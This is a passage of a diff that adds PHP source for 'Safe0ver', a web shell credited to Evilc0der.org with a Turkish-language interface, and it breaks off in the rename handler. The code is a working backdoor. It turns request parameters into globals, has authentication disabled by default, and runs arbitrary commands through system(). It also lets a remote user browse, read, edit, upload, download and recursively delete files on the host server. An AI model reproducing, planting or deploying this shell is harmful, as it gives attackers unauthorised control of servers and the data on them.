+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */        
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "Safe0ver";
+$scriptident = "$scriptTitle By Evilc0der.org";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+    $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+    $Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "7 Subat 2007";
+$scriptver = "Bet@ Versiyon";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+                "Edit"         => "edit.gif",
+                "Download"     => "download.gif",
+                "Upload"     => "upload.gif",
+                "Delete"     => "delete.gif",
+                "View"         => "view.gif",
+                "Rename"     => "rename.gif",
+                "Move"         => "move.gif",
+                "Copy"         => "copy.gif",
+                "Execute"     => "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+    else
+         $img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+        setcookie("noauth","");
+        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+        Header( "HTTP/1.0  401  Unauthorized");
+        echo "Your username or password is incorrect";
+        exit ;
+                 
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+    return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+    for ( $i = 0; $i < $mp; $i++ )
+        $ret .= "&nbsp;";
+    return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+    if (is_dir($Fdir)) {
+        $Fh=@opendir($Fdir);
+         while ($Fbuf = readdir($Fh))
+             if (($Fbuf != ".") && ($Fbuf != ".."))
+                Mydeldir("$Fdir/$Fbuf");
+        @closedir($Fh);
+                return rmdir($Fdir);
+    }    else {
+        return unlink($Fdir);
+    }
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+    $size = $insize;
+    $add = "B";
+    if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "KB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "MB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "GB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "TB";
+     }
+     return "$size $add";
+}
+
+if ($cmd != "downl") {
+    ?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body {
+	font-size: 12px;
+	font-family: arial, helvetica;
+	scrollbar-width: 5;
+	scrollbar-height: 5;
+	scrollbar-face-color: white;
+	scrollbar-shadow-color: silver;
+	scrollbar-highlight-color: white;
+	scrollbar-3dlight-color:silver;
+	scrollbar-darkshadow-color: silver;
+	scrollbar-track-color: white;
+	scrollbar-arrow-color: black;
+	background-color: #CCCCCC;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{
+	font-size: 12px;
+	font-family: arial, helvetical;
+	BORDER-LEFT: black 0px solid;
+	BORDER-RIGHT: black 0px solid;
+	BORDER-TOP: black 0px solid;
+	BORDER-BOTTOM: black 0px solid;
+	COLOR: black;
+	background: #CCCCCC;
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+            BORDER-RIGHT: black 1px solid;
+            BORDER-TOP: black 1px solid;
+            BORDER-BOTTOM: black 1px solid;
+          }
+    .none  {       BORDER-LEFT: black 0px solid;
+            BORDER-RIGHT: black 0px solid;
+            BORDER-TOP: black 0px solid;
+            BORDER-BOTTOM: black 0px solid;
+          }
+    .inputtext {
+            background-color: #EFEFEF;
+            font-family: arial, helvetica;
+            border: 1px solid #000000;
+            height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #CCCCCC;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: #CCCCCC;
+            border: 1px solid #000000;
+            border-width: 1px;
+            height: 20;
+    }
+    .inputtextarea {
+            background-color: #CCCCCC;
+            border: 1px solid #000000;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: #EFEFEF;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: #EFEFEF;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: #EFEFEF;
+            scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+           BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: Black;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: #CCCCCC; }
+body,td,th {
+	color: #660000;
+}
+a:link {
+	color: #000000;
+	text-decoration: none;
+}
+a:hover {
+	color: #00FF00;
+	text-decoration: none;
+}
+a:active {
+	color: #666666;
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+.style5 {
+	color: #660000;
+	font-weight: bold;
+}
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+   <tr>
+     <td width="100%" class="silver border"><center>
+         <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+     </center></td>
+   </tr>
+ </table>
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP><br>
+
+    <?php
+}
+
+if ( $cmd=="dir" ) {
+      $h=@opendir($dir);
+     if ($h == false) {
+          echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
+                Script Gecisi Tamamlayamadi!
+                <br><br>".sp(3)."\n
+                Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
+                <br><br></font>\n\n\n\n";
+     }
+        if (function_exists('realpath')) {
+        $partdir = realpath($dir);
+    }
+        else {
+        $partdir = $dir;
+    }
+     if (strlen($partdir) >= 100) {
+         $partdir = substr($partdir, -100);
+         $pos = strpos($partdir, "/");
+         if (strval($pos) != "") {
+             $partdir = "<--   ...".substr($partdir, $pos);
+         }
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+     }
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+       <br>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+           <td class="border nobottom noright">
+            &nbsp;Listeliyor:&nbsp;
+      </td>
+          <td width="100%" class="border nobottom noleft">
+           <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+      </td>
+     </tr>
+    </table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+      <td width="100%" NOWRAP class="silver border">
+       &nbsp;Dosya Adi&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Yapilabilecekler&nbsp;&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Boyut&nbsp;
+      </td>
+          <td width=1 NOWRAP class="silver border noleft">
+       &nbsp;Yetkiler&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Son Düzenleme&nbsp;
+      </td>
+     <tr>
+    <?php
+
+
+          /* <!-- This whole heap of junk is the sorting section... */
+
+     $dirn     = array();
+     $filen     = array();
+     $filesizes    = 0;
+     while ($buf = readdir($h)) {
+        if (is_dir("$dir/$buf"))
+            $dirn[] = $buf;
+            else 
+             $filen[] = $buf;
+        }         
+        $dirno     = count($dirn) + 1;
+         $fileno    = count($filen) + 1;
+
+          function mycmp($a, $b){
+            if ($a == $b) return 0;
+            return (strtolower($a) < strtolower($b)) ? -1 : 1;
+        }
+
+        if (function_exists("usort")) {
+            usort($dirn, "mycmp");
+            usort($filen, "mycmp");
+        }
+        else {
+            sort ($dirn);
+             sort ($filen);
+         }
+    reset ($dirn);
+     reset ($filen);
+     if (function_exists('array_merge')) {
+        $filelist = array_merge ($dirn, $filen);
+    }
+     else {
+        $filelist = $dirn + $filen;
+    }
+
+    
+    if ( count($filelist)-1 > $Pmax ) {
+        $from = $Pidx * $Pmax;
+        $to = ($Pidx + 1) * $Pmax-1;
+        if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+            $to = count($filelist) - 1;
+        if ($to > count($filelist)-1)
+            $to = count($filelist)-1;
+        $Dcontents = array();
+        For ($Fi = $from; $Fi <= $to; $Fi++) {
+            $Dcontents[] = $filelist[$Fi];    
+        }
+
+    }
+    else {
+        $Dcontents = $filelist;
+    }
+    
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+        reset($tdcolors);
+        $tdcolor = arrval(each($tdcolors));      }
+                   
+         if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                      /* <!-- Dirname --> */
+            echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                  /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                 /* <!-- Rename --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                 /* <!-- Delete --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                /* <!-- End of Actions --> */
+            echo "&nbsp;&nbsp;</center></td>\n";
+                  /* <!-- Size --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+             echo "<strong>D</strong>";
+                if ( @is_readable("$dir/$file") ) {
+                   echo "<strong>R</strong>";
+             }
+             if (function_exists('is_writeable')) {
+                if ( @is_writeable("$dir/$file") ) {
+                     echo "<strong>W</stong>";
+                 }
+            }
+             else {
+                    echo "<strong>(W)</stong>";
+              }
+              if ( @is_executable("$dir/$file") ) {
+                 echo "<Strong>X<strong>";
+             }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+            echo "</tr>\n";
+
+            }
+          else { /* <!-- Then it must be a File... --> */
+                     /* <!-- Filename --> */
+            if ( @is_readable("$dir/$file") )
+                 echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+              else
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                 /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                 /* <!-- Rename --> */
+            echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Edit --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                 echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                   /* <!-- Copy --> */
+             echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                  /* <!-- Move --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                     echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                    /* <!-- Delete --> */
+            echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- Download --> */
+            echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                 /* <!-- Execute --> */
+            if ( @is_executable("$dir/$file") )
+                 echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                    /* <!-- End of Actions --> */
+            echo sp(2)."</center></td>\n";
+                 /* <!-- Size --> */
+            echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+             $size = @filesize("$dir/$file");
+             If ($size != false) {
+                    $filesizes += $size;
+                echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+            }
+            else
+                echo "&nbsp;&nbsp;<strong>0 B<strong>";
+             echo "&nbsp;&nbsp;</td>\n";
+
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+             if ( @is_readable("$dir/$file") )
+                 echo "<strong>R</strong>";
+               if ( @is_writeable("$dir/$file") )
+                 echo "<strong>W</stong>";
+               if ( @is_executable("$dir/$file") )
+                 echo "<Strong>X<strong>";
+               if (function_exists('is_uploaded_file')){
+                 if ( @is_uploaded_file("$dir/$file") )
+                     echo "<Strong>U<strong>";
+             }
+             else {
+                echo "<Strong>(U)<strong>";
+            }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+             echo "</tr>\n";
+         }
+      }
+
+        echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+      echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+      echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+      echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+    
+    function printpagelink($a, $b, $link = ""){
+        if ($link != "") 
+            echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+        else
+            echo "<b>| $a - $b |</b>";
+    }
+        
+    if ( count($filelist)-1 > $Pmax ) {
+        echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+        $Fi = 0;
+        while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+            $from = $Fi*$Pmax;
+            while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+            $to = ($Fi + 1) * $Pmax - 1;
+            if ($Fi == $Pidx)
+                $link="";
+            else 
+                $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+            printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+            echo "&nbsp;&nbsp;&nbsp;";
+            $Fi++;
+        }
+        $from = $Fi*$Pmax;
+        while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+        $to = count($filelist)-1;
+        if ($Fi == $Pidx)
+            $link="";
+        else 
+            $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+        printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+        
+    
+        echo "</center></td></tr></table></td></tr>";
+    }
+
+
+        echo "</table>\n<br><table NOWRAP>";
+
+      if ($isGoodver) {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+    }
+     else {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+    }
+              /* <!-- Other Actions --> */
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+      echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                         buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                 buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+      echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+      echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
+       echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+      echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+      echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
+      echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+      echo "</table></td>";
+     echo "</table>";
+     echo "<br>";
+         @closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+     echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (Mydeldir($file)==false) {
+             echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+    }
+     else {
+        echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+         <input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (@unlink($file)==false) {
+             echo "Could not remove \"$file\"<br>";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+        echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+        }
+     else {
+           echo "Are you sure you want to delete \"$file\" ?
+          <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+         <input type=\"submit\" value=\"Yes\"></form>
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+    echo "<center><table><tr><td NOWRAP>";
+     $i = 1;
+     while (file_exists("$lastdir/newfile$i.txt"))
+         $i++;
+     $file = fopen("$lastdir/newfile$i.txt", "w+");
+     if ($file == false)
+         echo "Could not create the new file...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+         echo "
+               <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+            <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+            <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+            <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+            </form></center>
+             </td></tr></table></center>           ";
+    }
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     $i = 1;
+     while (is_dir("$lastdir/newdir$i"))
+          $i++;
+     $file = mkdir("$lastdir/newdir$i", 0777);
+     if ($file == false)
+         echo "Could not create the new directory...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+        <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+        <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+        </form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+    $contents = "";
+    $fc = @file( $file );
+      while ( @list( $ln, $line ) = each( $fc ) ) {
+          $contents .= htmlentities( $line ) ;
+     }
+     echo "<br><center><table><tr><td NOWRAP>";
+    echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+    echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+    echo "<strong>EDIT FILE: </strong>$file<br>\n";
+    echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+    echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+    echo "<input type=\"submit\" value=\"Save\">";
+    echo "</form>";
+    echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+    $fo = fopen($file, "w");
+    $wrret = fwrite($fo, stripslashes($contents));
+    $clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+    $downloadfile = urldecode($file);
+    if (function_exists("basename"))
+            $downloadto = basename ($downloadfile);
+    else
+        $downloadto = "download.ext";
+    if (!file_exists("$downloadfile"))
+        echo "The file does not exist";
+    else {
+        $size = @filesize("$downloadfile");
+        if ($size != false) {
+            $add="; size=$size";
+        }            
+        else {
+            $add="";
+        }
+         header("Content-Type: application/download");
+        header("Content-Disposition: attachment; filename=$downloadto$add");
+        $fp=fopen("$downloadfile" ,"rb");
+        fpassthru($fp);
+        flush();
+    }
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+       ?>
+    <center>
+     <table>
+      <tr>
+       <td NOWRAP>
+            Dosya Yükleme Sekmesine Tikladiniz !
+        <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
+      <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+             <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+             <input type="hidden" name="cmd" value="uploadproc">
+             <input type="hidden" name="dir" value="<?php echo $dir ?>">
+             <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+             Dosya Yükle:<br>
+             <input size="75" name="userfile" type="file"><br>
+             <input type="submit" value="Yükle">
+      </form>
+        <br>
+         <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+            <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+            <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+            <input tabindex="0" type="submit" value="Iptal">
+        </form>
+    </td>
+   </tr>
+ </table>
+    </center>
+
+     <?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+    echo "<center><table><tr><td NOWRAP>";
+    if (file_exists($userfile))
+        $res = copy($userfile, "$dir/$userfile_name");
+    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+         if ($res) {
+        echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+        echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+    }
+    else {
+        echo "Yüklenemedi...";
+    }
+    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+    echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+    $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+          echo spacetonbsp(@htmlentities($line))."<br>\n";
+      }
+    echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+         if (function_exists('is_dir')) {
+         if (is_dir("$oldfile")) {
+             $objname = "Directory";
+             $objident = "Directory";
+          }
